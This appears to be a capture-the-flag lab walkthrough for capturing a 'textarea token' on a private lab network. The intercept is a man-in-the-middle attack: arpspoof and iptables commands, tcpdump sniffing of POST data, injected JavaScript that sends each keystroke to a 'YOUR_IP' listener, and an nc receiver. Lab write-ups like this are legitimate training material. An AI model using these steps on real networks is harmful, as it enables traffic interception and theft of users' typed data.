master
Raw Download raw file

Token 6: Textarea Token

Token: [CAPTURE VIA HTTP INTERCEPT]

Objective

The webvictim.pccc types this token into the textarea on the page retrieved from web.pccc.

Hosts

  • webvictim.pccc: 10.0.91.136
  • web.pccc: 10.0.91.135

Method: HTTP Intercept + JavaScript Injection

The victim loads a page with a textarea and types data into it. This data is sent via JavaScript (likely XHR/fetch or form submission).

Step 1: ARP spoof

arpspoof -i eth1 -t 10.0.91.136 10.0.91.135 &
arpspoof -i eth1 -t 10.0.91.135 10.0.91.136 &

Step 2: Set up HTTP proxy

iptables -t nat -A PREROUTING -i eth1 -s 10.0.91.136 -d 10.0.91.135 -p tcp --dport 80 -j REDIRECT --to-port 8080

Step 3: Intercept and capture POST data

Option A - Passive capture (if form submits):

tcpdump -i eth1 -A -s0 host 10.0.91.136 and port 80 | grep -A20 "POST"

Option B - Active proxy to log all requests: Create a proxy that forwards traffic but logs POST bodies.

Option C - Inject JavaScript to exfiltrate: Modify the HTML response to include JavaScript that sends textarea content to your server:

document.getElementById('notes').addEventListener('input', function() {
    fetch('http://YOUR_IP:8888/?data=' + encodeURIComponent(this.value));
});

Step 4: Listen for exfiltrated data

nc -nlvp 8888

Why It Works

By intercepting HTTP traffic, you can either:

  1. Passively observe form submissions
  2. Actively inject JavaScript to capture keystrokes and exfiltrate them

The victim’s browser executes injected JavaScript, sending the typed data to your server.

Cleanup

pkill arpspoof
iptables -t nat -D PREROUTING ...